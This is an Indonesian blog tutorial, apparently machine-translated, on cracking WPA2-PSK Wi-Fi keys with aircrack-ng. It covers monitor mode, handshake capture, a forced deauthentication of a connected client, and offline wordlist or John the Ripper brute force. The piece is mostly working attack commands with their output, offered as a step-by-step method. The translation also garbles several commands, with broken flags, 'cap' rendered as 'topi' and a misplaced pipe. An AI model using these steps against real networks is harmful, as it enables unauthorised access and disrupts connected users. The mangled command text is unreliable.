Crack WPA2-PSK

Pada prinsip nya tutorial ini hampir sama dengan crack WPA.

Langkah-langkah dasar:

* Masukkan antarmuka mode monitor
* Cari jaringan nirkabel (dilindungi dengan WPA2 dan Pre Shared Key)
* Ambil semua paket
* Tunggu sampai Anda melihat deauthenticate klien dan klien, sehingga jabat tangan yang dapat ditangkap
* Crack tombol menggunakan file kamus (atau melalui John The Ripper)



Saya akan menggunakan DWL Teknis-G122 (USB) interface jaringan nirkabel untuk prosedur ini. Dalam backtrack4, perangkat ini diakui sebagai wlan0.

Pertama, memasukkan kartu ke dalam mode monitor:

root @ bt: ~ # airmon-ng

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]

root @ bt: ~ # airmon-ng start wlan0

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(Monitor mode diaktifkan pada mon0)

Ok, kita sekarang dapat menggunakan antarmuka mon0

Mari kita menemukan jaringan nirkabel yang menggunakan WPA2 / PSK:

root @ bt: ~ # airodump-ng mon0

CH 6] [TERPAKAI: 4 s] [2009/02/21 00:57

BSSID PWR Beacons # Data, # / s CH MB AUTH ESSID Cipher enc

00:19:05 B: 52: AD: F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Lost Tingkat Probe Paket

00:19:05 B: 52: AD: F7 00:01 C: BF: 90:5 B: A3 -29 0-1 12 4 TestNet

Berhenti airodump-ng dan jalankan lagi, menulis semua paket ke disk:

mon0 airodump-ng - channel 10 - 00:19:05 bssid B: 52: AD: F7-w / tmp/wpa2

Pada titik ini, Anda punya opsi 2: baik menunggu sampai klien menghubungkan dan jabat tangan 4-arah yang lengkap, atau deauthenticate klien yang ada dan dengan demikian memaksanya untuk reassociate. Waktu adalah uang, jadi mari kita kekuatan deauthenticate tersebut. Kami membutuhkan bssid dari AP (-a) dan mac dari klien yang terhubung (-c)

root @ bt: ~ # aireplay-ng -0 1-a 00:19:05 B: 52: AD: F7-c 00:01 C: BF: 90:5 B: mon0 A3
13:04:19 Menunggu frame suar (BSSID: 00:19:05 B: 52: AD: F7) pada saluran 10
Mengirim 13:04:20 diarahkan DeAuth 64. STMAC: [00:01 C: BF: 90:5 B: A3] [67 | 66 ACK]

Akibatnya, airodump-ng harus menunjukkan "WPA Handshake:" di sudut kanan atas

CH 10] [TERPAKAI: 2 menit] [2009/02/21 13:04] [jabat tangan WPA: 00:19:05 B: 52: AD: F7

BSSID PWR Beacons # Data RXQ, # / s CH MB AUTH ESSID Cipher enc

00:19:05 B: 52: AD: F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Lost Tingkat Probe Paket

00:19:05 B: 52: AD: F7 00:01 C: BF: 90:5 B: A3 -27 54-54 0 230

Berhenti airodump-ng dan pastikan file diciptakan dengan benar

root @ bt: / # ls / tmp/wpa2 *-al
-Rw-r - r - 1 root root 35189 2009/02/21 13:04 / tmp/wpa2-01.cap
-Rw-r - r - 1 root root 476 2009/02/21 13:04 / tmp/wpa2-01.csv
-Rw-r - r - 1 root root 590 2009/02/21 13:04 / tmp/wpa2-01.kismet.csv

Formulir titik ini, Anda tidak perlu mendekati jaringan nirkabel. Semua cracking akan terjadi offline, sehingga Anda dapat berhenti airodump dan proses lainnya dan bahkan berjalan jauh dari AP. Bahkan, saya sarankan untuk pergi dan menemukan sendiri tempat yang nyaman di mana Anda dapat tinggal, makan, tidur, dll .... Cracking kunci PSK WPA2 didasarkan pada bruteforcing, dan dapat memakan waktu yang sangat sangat lama. Ada 2 cara bruteforcing: salah satu yang relatif cepat namun tidak menjamin kesuksesan dan salah satu yang sangat lambat, tapi menjamin bahwa Anda akan menemukan tombol di beberapa titik waktu

Opsi pertama adalah dengan menggunakan worklist suatu / file drstionary. Banyak file-file ini dapat ditemukan di internet (misalnya www.theargon.com atau di packetstorm (lihat arsip)), atau dapat dihasilkan dengan alat seperti John The Ripper. Setelah wordlist yang dibuat, semua yang perlu Anda lakukan adalah menjalankan aircrack-ng dengan worklist dan pakan dalamnya fie tutup yang berisi Handshake WPA2..

Jadi jika Anda wordlist disebut word.lst (bawah / tmp / wordlists), Anda dapat menjalankan

aircrack-ng-w / tmp / wordlists / word.lst-b 00:19:05 B: 52: AD: F7 / tmp/wpa2 topi *.


Keberhasilan retak tombol WPA2 PSK secara langsung terkait dengan kekuatan file password Anda. Dengan kata lain, Anda mungkin beruntung dan mendapatkan kunci yang sangat cepat, atau Anda mungkin tidak mendapatkan kunci sama sekali.
Metode kedua (bruteforcing) akan berhasil pasti, tapi mungkin diperlukan waktu lama untuk selesai. Ingatlah, WPA2 kunci dapat berisi hingga 64 karakter, sehingga dalam teori Anda akan membangun setiap kombinasi password dengan semua karakter set mungkin dan pakan mereka ke aircrack. Jika Anda ingin menggunakan John The Ripper untuk membuat semua kombinasi password yang mungkin dan pakan mereka ke aircrack-ng, ini adalah perintah yang digunakan:


root @ bt: ~ # / pentest / password / jtr / john - stdout - tambahan: semua aircrack-ng |-b 00:19:05 B: 52: AD: F7-w - / tmp/wpa2 topi *.

(Catatan: PSK di testlab saya hanya 8 karakter, berisi satu karakter huruf besar dan 4 angka). Saya akan posting hasil ketika kunci retak, termasuk waktu yang diperlukan untuk memecahkan kuncinya.

Sumber : http://masddy.web.id/index.php?option=com_content&view=article&id=58&Itemid=64

0 komentar: